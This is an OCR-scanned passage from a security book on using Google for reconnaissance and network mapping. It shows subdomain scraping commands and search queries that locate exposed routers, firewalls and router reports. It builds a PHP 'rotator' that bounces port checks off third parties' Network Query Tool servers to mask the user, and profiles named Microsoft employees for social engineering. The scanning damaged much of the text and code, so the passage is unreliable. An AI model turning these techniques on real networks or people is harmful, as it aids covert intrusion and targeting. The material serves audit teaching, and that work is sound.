answered by the author, browse to www.syngress.com/solutions and click on the "Ask the Author" form. You will also gain access to thousands of other FAQs at ITFAQnet.com. Ql I know my company Intranet isn't in Google — is there any reason to check again? Al Just because Google hasn't found sensitive information yet, there is no guar- antee that your company's web development team won't slip up and expose your network. Just as you keep on top of security patches and exploits, so should you remain aware of potential HabiHty via Google. Ql How often should I check for sensitive company information in Google? A: Obviously, checking^afigift daily would take precious time away from your other duties. HowevM checKing once every six months may be too late. There is no one interval th^t can apply to every network, but a good rule of thumb is the larger mur netwod^nd the more often you should run your site through Googl^fcfer in tMs ^ok you wiU find some tools to automate the process for you. ^^"^^fc Ql How can I keep my users from outing sensi^e inforrr^ion about themselves? Al Simply put: you can't. You can educate your users and warn them about the dangers of exposing personal information about themselves on the Internet, but you can't prevent them from doing it. Your best course of action then, is to hold regular 'education' sessions with your users. Besides, if you have enough time to regularly spend tracking down the online activities of all your users, you probably should find another job that gives you something to do. www. syngress.conn 150 Chapter 4 • Pre-Assessment Q: Should a company have a paragraph in the security policy about Google? Al Every company should think of the risk of information leakage, including leaking to Google. The effect of search engines can be just as bad as dumps- terdiving, comprised teleworking equipment (laptops, pc's at home), etc. This existing guide could easily be expanded to include rules about the usage of public Usenet groups for questions and putting sensitive Office documents on the v^^ebserver. www. syngress.com Chapter 5 Network Mapping 4 Solutions in this Chapter: ■ Mapping Methodology II Map^g Techniques ■ ' Targeting Web-Enabled Network D Locating Various Networl< Reports "^0 Summary 0 Solutions Fast^rack 0 Frequently Asked Questions 4 1 152 Chapter 5 • Network Mapping Introduction The initial phase of an external blind security assessment involves finding targets to assess. Beyond simply locating targets, any good auditor (or attacker) knows that the easiest targets are those lost, forgotten machines that lie "off the radar" of the IT security team. In this chapter, we'll discuss ways Google can help with the network discovery phase of an external bUnd assessment. This is an important skill for any auditor, since more and more networks are being compromised not through exploitation of vulnerabiHties found on heavily guarded carefully moni- tored "fi-ont door" systems, but through exploitation of lost, forgotten systems that fall off the radar of already overworked administrators. We'll begin the chapter by discussing a very basic methodology for network discovery. Next, we'll look at some specific ways Google can be used to help in the discovery process. We'U discuss site crawling, domain name determination, link mapping, and group tracing, techniques that have proven to be excellent ways to enu- merate the hosts that exist on a network. As we wrap up this chapter, we discuss various ways that Web-enabled network devices can be discovered and exploited via Google to reveal surprisingly detailed information about a target network. As you read this chapter, bear in mind that the topic of network discovery is quite broad. In fact, an entire book could be dedicated to the mastery of this tech- nique. However, Google plays a valuable role in this process, and it's our hope that this chapter will provide you with just a few more tricks for your network discovery toolkit. Mapping Methodology In the context of the Internet, computers are categorized within domains. The most famous top-level domain, .COM, has practically become a household word. Working back from a top-level domain, company and server names are tacked on from right to left until a fuUy qualified domain name (FQDN) is formed. The FQDN (like www.sensepost.com) serves as a human-friendly address to a virtual location on a network, like the Internet. Although they serve us humans well as handy memory hooks, the machines that make up the Internet care little for these frilly FQDNs, preferring to reference machines on a network by a numeric Internet Protocol (IP) address. Granted, this is a simplistic view of the way things work on the Internet, but the point is that we, like Google, often prefer to speak in terms of FQDNs and domain names, reserving the numeric part of our lim- ited memories for more important things like phone numbers and personal gross www. syngress.com Network Mapping • Chapter 5 153 yearly earnings. However, when attempting to discover targets on a network, domain names and IP addresses need to be equally considered. Since Google works so well with domain names (remember the site oper- ator), a network discovery session can certainly begin with a domain name. We'U use sensepost.com as an example domain since SensePost has pioneered many unique network discovery techniques, some of which we'U discuss in this chapter. SensePost, like most companies, has several registered domain names. In the first phase of a solid mapping methodology, we must first discover as many domain names associated with SensePost as possible. In addition to discovering domains owned by the target, it's often important to review sites linked to and sites linked from the target. This reveals potentially important relationships between domains and could provide important clues about any type of trust rela- tionships between the two domains. Armed with a list of domains owned by the target, a list of subdomains could be gathered. A subdomain extends a domain name by one level. For example, sales.sensepost.com could be a valid subdomain ofsensepost.com. In most cases, each subdomain points to a distinct machine on the network. A domain offtp.sensepost.com could point to a dedicated FTP server, while www.sensepost.com could point to a dedicated Web server. Because of this, it's important to determine IP addresses used by the target network. Since address space on the Internet is regulated, each IP address must be properly regis- tered. Since IP address registration information is public, it's fairly common for security auditors to query the various Internet registrars for information about a particular IP address. This registration information includes contact name, address, telephone number, and information about the IP address block owned by the target. This block of addresses allows you to safely expand the scope of your assessment without worrying about stumbling onto someone else's network during your audit. Once IP addresses are determined, the audit wiU generally begin to blur into the next phase, the host assessment phase. Each IP address must be tested or "pinged" by any variety of methods to determine if the machine is alive and accessible. Machines are then scanned to determine open ports, and applications running on these ports are tested for vulnerabilities. Although many different tools and techniques could be employed for each phase of this (admittedly basic) methodology, Google's search capability can play an important role in each of these phases, as we'll see in the following sections. www. syngress.com 154 Chapter 5 • Network Mapping Mapping Techniques In this section, we'll see creative ways Google can be used to assist in the net- work discovery and mapping process. The techniques here are presented in roughly the same order they appear in the mapping methodology. Domain Determination Since it's important to gather as many domain names as possible, we need to dis- cuss some techniques for determining domain names the target may own. One of the most common sources for domain information is the various Internet reg- istries. Techniques for exploring Internet registries are weU known and well doc- umented. However, a few very simple methods can be used to determine the possible domain names registered by an organization. At the 2003 BlackHat briefings in Las Vegas, SensePost presented an excellent paper entitled "Putting the Tea Back into Cyber Terrorism" in which Roelof Temmingh discussed this very topic. Roelof 's suggestions were simple, yet effective. First, and most obviously, determine where the organization is based. This wiU affect the top-level domain (TLD). Sites in the United States often use the common .COM, .NET, .ORG domains. Outside the United States, sites wiU often use a domain name like .co.XX or .com.au, where XX represents a country code. In some cases, it's possible that the target organization has Web sites registered in many different countries. In this case, multiple TLDs should be searched. Once a TLD is determined, the first obvious domain includes the common name of the company, stripped of spaces, followed by the TLD; for example, Telstra's Australian siteTelstra.com.au. Other domain names can be determined using these techniques: ■ If the organization's name has a common abbreviation, use that. For example. National Australian Bank, nab.com.au. ■ If the organization is known by a common abbreviation that would create an ambiguous or invalid domain name, a country abbreviation could be included in the domain name. For example, consider Deutsche Telekom at dtag.de or Japan Airlines atjal.co.jp. ■ If the organization name contains spaces, remove them, appending the TLD. For example. Banco do Brasil at bancodobrasil.com.br. www. syngress.com Network Mapping • Chapter 5 155 ■ If the organization name contains many words, attempt all the words in the name. For example, consider lucent.com. ■ If a domain search returns domain names that don't seem to fit, consider using a correlation function to determine how many sliding three-char- acter instances match between the company name and the domain name. For example. Coca Cola Enterprises found at cokecce.com, or Kansai Electric Power found at kepco.co.jp. These techniques work very well at determining domain names, even when the domain names are not "public." For example, a Google search for site:nab. com.au returns no hits, even though the site resolves and forwards to the National Australian Bank Web site. However, for the vast majority of domain names, simply entering a company name into a properly formatted Google query wiU list many viable domain names, as we'U see in the next section. Site Crawling Simply popping a company name into Google often returns the most popular domain name for that company. However, gathering a nice list of subdomains can take a bit more work. Consider a search for site:microsoft.com shown in Figure 5.1. Figure 5.1 Site Searches Return Common Domain Names O O O Google Search: site:micra5oft.coni ^^ " "] [ C ] |C]littp://www.gQt>gle.ct>m/search?lil=enS!lr=S!q=5ite3fe3AinlcrQSQlt.cQmi ' Q,^ microsoft, corr Web imaoes Groups News Froogle more » GoiJgle siMifnicfoiofi.com Web Results 1 - 10 of about 1,SM,000fnom microsoft.com for . (0.S7 seconds) Tip: Save time by hitting the return key instead of clicking on "search" How lo Buy Microsoft Developer Products: Visual Basic .NET2QG3 . Search for MSDN and KB, Advanced Search, msdn.microsoftxomyhowtobuyyvbasicydefauit.aspx - 21l< - Cached - Similar pages Microsoft Security Guidance Center: Worldwide Security Guidance MicrDSDft.com Home, |, Site Map. Microsoft, Search MicrDSDft.com for. Security & Privacy Home. Security Guidance Center. Recently Pubiished. Security Topics. ... vrtvw.microsoft.com/securit'y/ guidance/woridwide/default.mspx - 15k - Cached - Similar pages Download details: Cumulative Security Update for Internet Explorer... Microsoft, Search Microsoft.com for: , www.microsoft.com/downloads/ details. aspj;?FamilylD-a89cfbeS-c299-415d-a9d6-7cc6429c547d8idi5piayiang=en -26k - Cached - Similar oaoes Home do Microsoft Windows Media - ] MicrDSDft.com Brasil Home. |, Mapa do Site. Microsoft. Procurar no Microsoft. com por. Inicio do Windows Media, |, Windows Media no Mundo Inteiro, ... www.microsoft.com/windowsywindowsmedia'br/ - l6k - Cached - Similar pages www.micro5ofl.com/windows/netmeeting/global/local_server.asp www.syngress.com 156 Chapter 5 • Network Mapping Looking at the first five results from this query, there's not much variety in the returned DNS names. Only two unique domain names were returned — www.microsoft.com and msdn.microsoft.com — the latter of which is most likely a subdomain since it does not begin with a common-looking hostname like "www." One way to narrow our search to return more domain names is by adding a negative search for www.microsoft.com. For example, consider the results of the query site:microsoft.com -site:www.microsoft.com, or site :microsoft. com -site:www.microsoft.com as shown in Figure 5.2. Figure 5.2 Reducing Common Subdomains (3 O (3 Google Search: sitermicrasoft.cam -www.microsoft.com [ ^ p^- I [ C I |G|lnltp://www.google,com/sear<:h?hl=en&lr = &t;=5i' ^ Q' siteimicrosoft.tom -www.micro5oft.cam Google Web Images Groups N&ws Froogle more » ^.iteMnicro soft. ■com -wvvw.micro5oft.com f Se Advanced Sa-arch Web Results 1 - 1 D of about &7&,DD0 from micrD5oft.com for -www.micro5Dft.com. (0.39 seconds) Tip: Save time by flitting the return key instead of eliciting on "searcii" How 10 Buy Microsoft Developer Products: Visual Basic .NET2QQ3 ■■■ Search forMSDN and KB, Advanced Search. ... msdn.microsoft.comyhov^cbuy/vbasic/default.aspj: - 21k - Nov 10, 2004- Cached - Simiiar pages Events Home Registration Options Event Code 1DS225B31D. Smaii Business Webcast: Get Organized: Microsoft Office OneNote for the Small Business User — Levei 100 ... msevents.mlcrosoftxonilCUI/EventDetalL aspx?EventlD=1D3225B310&Culture=en-LJS - 19k - Cached - Sin MCPP Task Details MCPP Home, FAO. Program Entry Requirements, License Overview. Pricing Overview. Support Overview. Sampie Technicai Documentation. Optionai Documents. Server Tasks ... members. m I crosoft.com/consent' lnfQ'TasklnfD.aspx?pkld=1 136 - 42k - Cached - Simiiar oaoes An HTTPS Web page does not download connGlelelv In Internet ... An HTTPS Web page does not download compieteiy in Internet Explorer 5.5 Article ID, : S37209. Last Review, : September 27, 2UM Revision. :^ 1. ... support.micnjsoft.com/?kbid=&37209 - 9k - ^--dur^ij - ...LUL^Lis; j.^-.:^^ This search returns more variety, returning four new domain names in the first four results. These names (msdn, msevents, members, and support) could also be added as negative queries to locate even more results. A technique like this is very cumbersome, unless it is automated. We'U cover more automation tech- niques later, but let's consider two simple examples. First, we'U look at a page scraping technique. Page Scraping Domain Names Using the popular command-line browser lynx supplied with most UNIX-based operating systems, we could grab the first 100 results of this query with a com- mand like: www. syngress.com Network Mapping • Chapters 157 lynx -dump "http :/ /www. google . coin/search?\ q=site rmicrosoft . com+-www. microsoft . com&num=100 " > test.html This would save the results of the query to a file, which we could process to extract domain names. Note that Google does not condone automated queries as mentioned in their Terms of Service located at www.google.com/terms_of_ser- vice.html. However, Google has not historically complained about the use of the lynx browser to perform this type of query. Once the results are saved to the test.html file, a few shell commands can be used to extract domain names as shown in Figure 5.3. jShnnys-Computer : $ lynx -dump "http://www.gciogLe.com/search?\ > q=site:micrDsoft.com+-www.microsoft.com£fium=100" > test.html jShnnys-Computer : $ sed -n 's/\. http:\/\/[[:alpha:]]*.iiiicrosoft.coiii\//£: /p ' tes t.html I awk '{print $2}' I sort -u http : //communities .microsoft .com/ http ://down load .microsoft .com/ http ://go .microsoft .com/ http ://members .microsoft .com/ http ://msdn .microsoft .com/ http ://msevents .microsoft .com/ http ://mur I .microsoft .com/ http ://off ice .microsoft .com/ http : //research .microsoft .com/ http ://search .microsoft .com/ http://support.microsoft.com/ http://uddi .microsoft.com/ jShnnys-Computer: $ | This process yields 13 unique subdomains (including the www.microsoft.com domain) from a single page of 100 Google hits. Extending the search involves simply appending &start= 1 00 to the end of the lynx URL, appending the html into the test.html file, and then running the shell script again. This will return results 100-200 fi-om Google. In fact, this process could be repeated over and over again until 1000 Google results are retrieved. However, keep in mind that the 80/20 rule applies here: In most cases, you'll get 80 percent of the best results Figure 5.3 Simple Shell Commands Scrape Domain Names 158 Chapter 5 • Network Mapping from the first 20 percent of work. For example, extending this search to retrieve 1000 Google results returns the following subdomains: http :/ /c .microsoft . com/ http : / / communities .microsoft . com/ http : / / download .microsoft .com/ http : / /go .microsoft . com/ http : / / ieak .microsoft .com/ http : / /members .microsoft . com/ http : / /msdn .microsoft .com/ http : / /msevents . microsoft . com/ http : / /murl .microsoft . com/ http : / / office .microsoft . com/ http : / /rad. microsoft . com/ http : / / research .microsoft .com/ http : / /search .microsoft . com/ http : / /support .microsoft .com/ http : / /terraserver .microsoft . com/ http : / /uddi .microsoft . com/ http : / /windows .microsoft . com/ http : / /www. microsoft . com/ This list includes only 18 subdomains. This means that over 70 percent of the results came from the first 100 Google results, while less than 30 percent of the results came fr^om the next 900 results! In cases like this, it may be smarter to start reducing the more common domain names (msdn, support, download) from the Google query before trying to grab more data from Google. It's always best to search smart and parse less. API Approach Another alternative for gathering domain names involves the use of a Perl script. The Google API allows for 1000 queries per day and is the only approved way to automate Google queries. One excellent script, dns-mine.pl, was written by Roelof Temmingh of SensePost (www.sensepost.com). This script is covered in detail in Chapter 12, but let's look at dns-mine in action. Figure 5.4 shows a por- tion of the output from dns-mine run against microsoft.com. www. syngress.com Network Mapping • Chapter 5 159 Figure 5.4 dns-mine Automates Domain Name Discovery Terminal — bash — SSx^O DNS names: m vB.windousupdate.microsof t .com dgL .mlcrosoft.com www .beta .microsoft .com g. ml crosoft.com msevents .microsoft .com www .microsoft .com wlndowsbeta.mlcrosof t .com off Ice .microsoft .com netscan .research .microsoft .com go.mlcrosoft.com webevents .microsoft .com msdn .microsoft .com partner 1 ng . one . m 1 crosof t . com beta .microsoft .com off icebeta .microsoft .com act 1 vex . m 1 crosof t . com oca .microsoft .com eopen .microsoft .com Lab .msdn .microsoft .com down Load .microsoft .com terraserver .microsoft .com murL .mlcrosoft.com ntbeta .microsoft .com v4.wlndowsupdate.mlcrosoft.com home .microsoft .com support .microsoft .com research .microsoft .com dns-niine searches for the name of the company combined with different types of common words like site, web, document, internet, link, or about.Thc script then intelligently parses the query results to find DNS names and subdomains. As you can see from the output in Figure 5.4, dns-mine located nearly twice as many DNA names as our previous technique, with nearly the same number of queries. Link Mapping Beyond gathering domain and subdoniain names, many times it's important to understand nonobvious relationships between Web sites. In some cases, locating a vulnerability in a poorly secured trusted partner site is a simple way to slip inside a heavily-guarded "big iron" target. One of the easiest ways to determine obvious relationships between Web sites is to take some time to explore a target Web site. If your target links to a page, there may be some kind of trust relationship that could be exploited. If some other site Hnks to your target site, this may also indicate some kind of relationship, but this kind of "inbound link" is less meaningful since any Internet user can throw up a link to any Web site she pleases. In technical terms, a www. syngress.com 160 Chapter 5 • Network Mapping hnkfrom your target site has more weight than a link to your target site. However, if two sites link to each other, this indicates a very strong relationship. This type of rela- tionship exists at the first degree of relevance, but there exists other degrees of rele- vance. For example, if our target site (siteA) Mnks to another site (siteB), and that site links to a third site (siteC) that hosts a link back to our target (siteA) , there is a relationship (albeit a loose relationship) between our target and siteC via siteB.This overly simplifies the very important concept of "link weighting." The researchers at SensePost (www.sensepost.com) have put a lot of time and effort into uncovering online nonobvious relationships and exploiting the relevance of these relationships in the context of security work. Their BlackHat 2003 Paper entitled "The role of non-obvious relationships in the footprinting process" details some very powerfial "footprinting" techniques that apply to this topic of network mapping. We won't be able to do SensePost's awesome work justice in a few short pages, but suffice it to say that Google plays a very important role in the mapping process. The link operator, for example can be used to determine what sites link to a target (Uke www.sensepost.com) at the first level of relevance with a query like link:www.sensepost.com as shown in Figure 5.5. Figure 5.5 linkto as a First-Pass Link Checker @l O Q Coogle Search: llnkiwww.sensepost.com ^^^H t *^ I [ C I [ + I [G]http://www.google.com/search7q = link:www ^'^0:^ link:www.5Gn5epost.ctim ^^^M Web Images Groups News Froogle mare » { jj^^l^j^ linkiwww.&ensepo&t.com j (^Search j l Advanced Seajch FreferenoBS W-Gb Results 1 - 10 of about 55 linkinrg to www.sensepost.conn. (0.26 secorvfe) DeWiL-QueHKa p^icKa aamMTbi b MHiepHere I dewil site. ... dewil.m.'s©curityJarticle/estimation_of_risk.' - 691c - Cached - Similar pages SECURITY-ARCHIVE archives - March 2002 (#479) Date: Sat, 16 IVlar 2002 00:58:52 +0000 Reply-To: RT Sender: Archivio iiste sicurezza Sender Archivio iiste sicurezza output=gplain [ < I [ C I |G]http://groups. google. com/groLjps7selm=151ade9cl. 0411 " Qr aiJttior:@mlcrasoft.com From: aoltean^Hiiccosof t . com [Adi Oltean ^HSPT]) Kewsgroups : comp . coinpression Subject : Re : Decompressing .KSl Date: 9 Nov 2004 15:22:58 -0800 Organisation ; http ! //groups . google .com Lines ! 1$ Message-ID : < 15 ladSQd. 04 11091522 . 6e702 dc2 6 posting . google . com,> Heferences : cceel&l74. 04 1109092 1 . 5l60d6596 posting . google . com,> HHTP-Posting-Bost: 13l . I07 . 71 . 96 Content-Type : text /plain; char3et=iIS0-SS59- 1 Content-Transfec-Encoding: 8bit X-Trace! posting . google . com 1100042578 22179 127.0.0.1 (9 Hov 2004 23:22:58 GHT) X-Complaints-1'D : groups-abuseflgoogle . com NNTP-Posting-Date: Tue, 9 Hov 2004 23:22:58 +0000 (UTC) tcdo . 9172 fibumpyiuail . coiiL [tcdo.9172] wrote in message news: . . . > Hou do I decompress a .MSI microsoft installer file? > > I haven't found any program that can do it. HSI is not really a compressed format . It is a binary database-like format . The header of this newsgroup posting reveals a great deal of information, but from the standpoint of creating a network map, the NNTP-Posting-Host, listed as 131.107.71.96, is relevant. This host, which resolves to tidel33.microsoft.com, can be added to a network map as an NNTP server, without ever sending a single packet to that network, all because of a single Google query. In addition, this information can be reversed in an attempt to find more usernames with a Groups query of 131.107.71.96 as shown in Figure 5.9. Figure 5.9 A Reversed Author Search 0 O O Google Search: 131.107.71.96 "M 1 ^ i- I [C|http://grojps.3ac}gla,<:om/grPjp&?q=131,l[i7.71.9'6ahl=en&lr=asafe=Qf ' Q.' 131,107.71.96 a| Googk Groups^ Groups Web Images Groups News Froogle more j , 131.137.71.95 groups: n i c rps pf t. Du bli c . biztal k . n onx ml Rraults 1 -4 of 4 for 131.107.71.96. (O.M seconds) Sorted by relevance Sort by dale Re: Map Test Error - Flat ta X1 2 BTS 2004 ... 9009le.com:> References: ■«:f22e7f03.W-101S1420.243SSd44@posting.goo3le.com> '^bSKTgfrtEHA.SBOa^cpmsftngxalO.phx.gbh NNTP-Postirg-Host: 131.1C7.T1.96 Content-Type ... micr&s&ft.public.biztalk.nQn>!ml - Oct 25, 20CW by "David Downing [MSFT]" - View Thread (4 articles) RE: Schema validatisn errors - Pip 7B1 - BizTalk 2004 ... Organizati^on: http:yy9roups.9003le.com Lines: 12 Message-lD: NNTP-Poslirg-Host: 131.1D7.71.96 Content-Type ... microsoft.public.bizlallt.acc&leratcir.ros&ttan&t - Nov 4. 2004 by Tatyana Yakushev [MSFT] - View Thread t2 articles) RE: Map Test Error - Flat to XI 2 - BTS 2004 ... Organization: http://graups.goo3ie.<;am Lines: 11 M^sage-ID: NNTP-Posting-Host: 131.107.71.96 Contant-Type ... miGrosoft.pubiic.bizlaik.npnKmi - Oct 20. 2004 by "David Downing [IVISFT]" - ViewTliread i4 articles! Re: Mac Test Error - Flat lo X1 2 BTS 2004 ... Organization: http:yygroups.900gie.com Lines: 11 Message-ID: '^f22e7f03.04101S1420.243eed44@posting.googie.com5' NNTP-Posting^Host: 131.1D7.71.9G Content Type ... micros oft. public. biztaik.nony mi - Oct 21, 2004 by Nick - View Tliread f4 articiesl www.syngress.com 166 Chapter 5 • Network Mapping These results reveal that David Downing, TatyanaYakushev, and Nick are all most likely Microsoft employees since they use MSFT in their descriptions and have posted messages using an apparently nonpublic Microsoft NNTP server. Under normal circumstances, this "Nick" character could be just about anyone, but his use of a Microsoft-only NNTP server confirms his identity, and ties him to both David and Tatyana. There is also the possibility that these three employees work in the same office as they have similar job duties (evidenced by their posting to the same specifically technical newsgroup) and share an NNTP server. This type of information could be handy for a social engineering effort. Non-Google Web Utilities Google is amazing and very flexible, but it certainly can't do everything. Some things are much easier when you don't use Google. Tasks like WHOIS lookups, "pings," traceroutes, and port scans are much easier when performed outside of Google. There is a wealth of tools available that can perform these functions, but with a bit of creative Googling, it's possible to perform all of these arduous functions and more, preserving the level of anonymity Google hackers have come to expect. Consider a tool called NQT, the Network Query Tool, shown in Figure 5.10. Figure 5.10 The Network Query Tool Offers Interesting Options a 6 6 Network Query Tool iQ" Google Network Query Tool Host Information Host Connectivity C Resolve/Reverse C Check port: so Lookup C Trace route to host C Get DNS Records ® Do it all C Whois (Web) C Whois (IP owner) [Do it^^^^l Display a. menu Default installations of NQT allow any Web user to perform IP host name and address lookups, DNS queries, WHOIS queries, port testing, and traceroutes. www. syngress.com Network Mapping • Chapters 167 This is a Web-based application, meaning that any user who can view the page can generally perform these functions, against just about any target. This is a very handy tool for any security person, and for good reason. NQT functions appear to originate from the site hosting the iVQT application. The Web server masks the real address of the user. The use of an anonymous proxy server would further mask the user's identity. We can use Google to locate servers hosting the NQT program with a very simple query. The NQT program is usually called nqt.pbp, and in its default configuration displays the title "Network Query Tool." A simple query like inurlmqt.php intitle: "Network Query Tool" returns many results as shown in Figure 5.11. Figure 5.1 1 Using Google to Locate NQT Installations f3 f]^ Google Search: inurhnqt.php intitle; "Network Query Tool" [ ^ ^ ] [G] http://www.g0o9le.cor " inurhnqt.php intit!e:"Network Query Tool" 01 Google Web I m apes Groups News Froooie more » inurl:nqt,php ifilitle:"Network Query Too]" r~ r> Advanosd Search ( -Search J p^fa^nces WGb Results 1 - 10 of about 51 for inurlmqt.php intitle: "Network Query Tool". (0.51 secortds) Network Query Tool Network Query Tool. Host Information, Host Connectivity. Resolve^'Reverse Lookup Get DNS Records Whois (Web) Whois (IP owner). Check ... noc.nekesc.orgi'nqt.php - 3k - Cached - Similar pages [ Network query tool ] Target from reaper.org NQT2O030507, Command. Ping V4. ... reaper.org/'^daniel/tools/nqt.php?proceed=1121 - 3k - Cached. - Similar pages :: Network Query Tool :: Host Infonnation, Host Connectivity. Resolve'Reverse Lookup Get DNS Records Whois (Web) Whois (IP owner). Check port: Ping host Traceroute to host Do it all. ... v\ww. iservetech.comy network -tool s/nqt.php - 6k - Cached - Similar pages I After subnTitting this query, it's a simple task to simply click on the results pages to locate a working NQT program. However, the NQT program accepts remote POSTS, which means it's possible to send an NQT "command" from your Web server to the foo.com server, which would execute the NQT "com- mand" on your behalf. If this seems pointless, consider the fact that this would allow for simple extension of NQT's layout and capabilities. We could, for example, easily craft an NQT "rotator" that would execute NQT commands against a target, first bouncing it off an Internet NQT server. Let's take a look at how that might work. www. syngress.com 168 Chapter 5 • Network Mapping First, we'll scrape the results page shown in Figure 5.11, creating a list of sites that host NQT. Consider the following Linux/Mac OS X command: lynx -dump " http : / /www. google .com/ search?q=inurl : nqt .php+%22Network+\ Query+Tool%22&num=100 " | grep "nqt.php$" | grep -v google | awk '{print $2}' | sort -u This command grabs 100 results of the Google query inurl:nqt.php intitle: "Network Query Tool", locates the word nqt.php at the end of a line, removes any line that contains the word google, prints the second field in the list (which is the URL of the NQT site) , and uniquely sorts that list. This com- mand wiU not catch NQT URLs that contain parameters (since nqt.php wiU not be the last word in the link), but it produces clean output that might look some- thing like this: http : / /bevmo . dynsample . org /up time /nqt . php http : / /biohazard . si f sample? . com/ nqt .php http : / /cahasample . com/nqt . php http : / /samplehost . net /resources /nqt .php http : / /linux . sample . nu/phpwebsite_vl/nqt .php http : / /noc . bogor . indo . samplenet . id/nqt . php http : / /noc . cbn . samplenet . id/nqt .php http : / /noc . neksample . org/nqt .php http : / /portal . trgsample . de/network/nqt . php We could dump this output into a file by appending » nqtfile . txt to the end of the previous sort command. Now that we have a working list of NQT servers, we'U need a copy of the NQT code that produces the interface displayed in Figure 5. 10. This interface, with its buttons and "enter host or IP" field, wiU serve as the interface for our "rotator" program. Getting a copy of this interface is as easy as viewing the source of an existing nqt.php Web page (say, from the list of sites in the nqtfile. txt fUe), and saving the HTML content to a file we'U call rotator.php on our own Web server. At this point, we have two files in the same directory of our Web server — an nqtfile.txt file containing a list of NQT servers, and a rotator.php fUe that contains the HTML source of NQT. We'll be replacing a single line in the rotator.php file to create our "rotator" program. This line, which is the beginning of the NQT input form, reads: WWW. syngress.com Network Mapping • Chapters 169 This line indicates that once the "Do it" button is pressed, data will be sent to a script called nqt.php. If we were to modify this form field to , our rotator program would send the NQT command to the NQT program located at foo.com, which would execute it on our behalf. We're going to take this one step further, inserting PHP code that wiU read a random site from the nqtfile.txt program, inserting it into the form line for us. This code might look something like this (lines numbered for clarity): 1 . < ?php 2. $array = file ( " . /nqtsites . txt " ) ; 3 . $site=substr ( Sarray [rand ( 0 , count ($ array) -1 ) ] ,0,-1) ; 4. print "

" ; 5. print "Using NQT Site: $site for this session .
" ; 5. print "Reload this page for a new NQT site .

" ; 7. ?> This PHP code segment is meant to replace the line in the original NQT HTML code. Line 1 indicates that a PHP code segment is about to begin. Since the rest of the rotator.php file is HTML, this line, as well as line 7 that terminates the PHP code segment, is required. Line 2 reads our nqtsites.txt file, assigning each line in the file (a URL to an NQT site) to an array element. Line 3, included as a separate line for read- ability, assigns one random line from the nqtsites.txt program to the variable $site. Line 4 outputs the modified version of the original /onw line, modifying the action target to point to a random remote NQT site. Lines 5 and 6 simply output informative messages about the NQT site that was selected, and instruc- tions for loading a new NQT site. The next line in the rotator.php script would be the table line that draws the main NQT table. When rotator.php is saved and viewed in a browser, it should look similar to Figure 5.12. www. syngress.com 170 Chapter 5 • Network Mapping Figure 5.12 The NQT Rotator in Action a e e © "Q." Google U sing N QT S itc: http://www . - .cotn/netwoik-tools/nqt .php for this session . Reload this page for a new NQT site. Host Information Host Connectivity 0 Resolve/Reverse Lookup C Get DNS Records C Whois (Web) C Whois (IP owner) C check port: SO O Ping host C Traceroute to host ■ ® Do it all i ^^^^^^^^^ Enter host or IP ^ Do It "i^^^^^^^l □tsplay a menu Our rotator program looks very similar to the standard NQT program inter- face, with the addition of the two initial lines of text. However, when the "check port" box is checked, www.microsoft.com is entered into the host field, and the Do It button is clicked, we are whisked away to the results page on a remote NQT server that displays the results — port 80 is, in fact, open and accepting con- nections as shown in Figure 5.13. Figure 5.13 NQT "Rotator" Output To O O Network Query Tool ^mHH^^^^H^H ■| ^ - 1 1 C 1 0http://noc.nek5ample,org/nqt.php Q) -'Ct- Google Network Query Tool Host Infonnatkin Host Connectivity C Resolve/Reverse Lookup 3 Check port: so C Get DNS Records " pjpg f,Qg(- C Whois (Web) 3 Traceroute to host fl C Whois (IP owner) 0 j^o it all " w^vw. microsoft, com . .1 [>□ it^^^^^^^^^l Checking Port 80... Port 80 is open and accepting corrections. WWW. syngress.com Network Mapping • Chapters 171 This example is designed to suggest that Google can be used to supplement the use of many Web-based applications. AH that's required is a bit of Google know-how and a healthy dose of creativity. Underground Googling... Netcraft aid Google The Netcraft page at www. netcraft. com/whatis is excellent for getting a quick idea of the type of Web server used by an organization. However, an interesting twist suggested by offtopic@mail.ru involves using Google to search for previously Googled Netcraft results. A query like siteinetcraft.com intitleiThat. Site. Running will show cached results pages. Want to troll for Apache servers? Toss the word Apache on the end of the query. Netscape? Tomcat? You name it; Netcraft's seen just about them all. Targeting Web-Enabled Network Devices Google can also be used to detect the presence of many Web-enabled network devices. Many network devices come preinstaUed with a Web interface to allow an administrator to query the status of the device or to change device settings with a Web browser. While this is convenient, and can even be primitively secured through the use of an SSL-enabled connection, if the Web interface of a device is crawled with Google, even the mere existence of that device can add to a silently created network map. For example, a query like intitle: "BorderManager information alert" can reveal the existence of a Novell BorderManager Proxy/Firewall server as shown in Figure 5.14. www. syngress.com 172 Chapter 5 • Network Mapping Figure 5.14 Google Reveals Novell BorderManager Proxy/Firewall f3 O O BorderManager Information Alert I ^ - I I C I |G| http://2J6.239, 39, 104/search?q=cache:EWfY ~ ■ Q.- ifititle:"BorderMana9er Information aiert" Enhancing Your Intern et Experience Novella BorderManager " Information Alert HTTP Error Status: 502 Bad Gateway Descriptron: DNS Host name reSolutfon failed, (piedrnont Note slf necessary, please contact your Systems Administrator for resolution. t , Dcsplav a meriLt A crafty attacker could use the mere existence of this device to craft his attack against the target network. For example, if this device is acting as a proxy server, the attacker might attempt to use it to gain access to machines inside a trusted network by bouncing connections ofi^ this server. Additionally, an attacker might search for any public vulnerabilities for this product in an attempt to exploit this device directly. Although many difierent devices can be located in this way, it's generally easier to harvest IP and network data using the output from network statistical programs as we'U see in the next section. To get an idea of the types of devices that can be located with this technique, consider queries like "Version Info" "Boot Version" "Internet Settings" , which locate Belkin Cable/DSL routers; intitle:"wbem" Compaq login, which locates HP Insight Management Agents; intitle:"lantronix web-manager", which locates Lantronix web-managers; inurhtech-support inurl:show Cisco or intitle:" switch home page" "cisco systems" "Telnet - to", which locates various Cisco products; or intitle:"axis storpoint CD" intitle:"ip address", which can locate Axis StorPoint servers. Each of these queries reveals pages that report various bits of information about the networks on which they're installed. www. syngress.com Network Mapping • Chapters 173 Locating Various Network Reports In addition to targeting network devices directly, various network documents and status reports can be located with Google that give an outsider access to every- thing from IP addresses on the network to complete, ready-to-use network dia- grams. For example, the query "Looking Glass" (inurl:"lg/" | inurhlookingglass) will locate looking glass servers that show router statistical information as shown in Figure 5.15. Figure 5.15 Looking Glass Router Information e o e ■LAN Looking Glass I I C I |LH^h1tp://noc.[lan. .il/[g[-bm/5g.sh? " Or "Looking Glass" fmurli'lg/" | inurlilookjngglass) ILAN Looking Glass TMs interface wiM shew up tc 200 lines of output only I BGP table veraian is 2120521, local router ID is 192.114.99.250 Status codes: 3 supptessedj d damped^ h histary, * valid, > beat, S Stale Origin codes! i - IGP, e - EGP, 7 - innoinplete tJetwor k 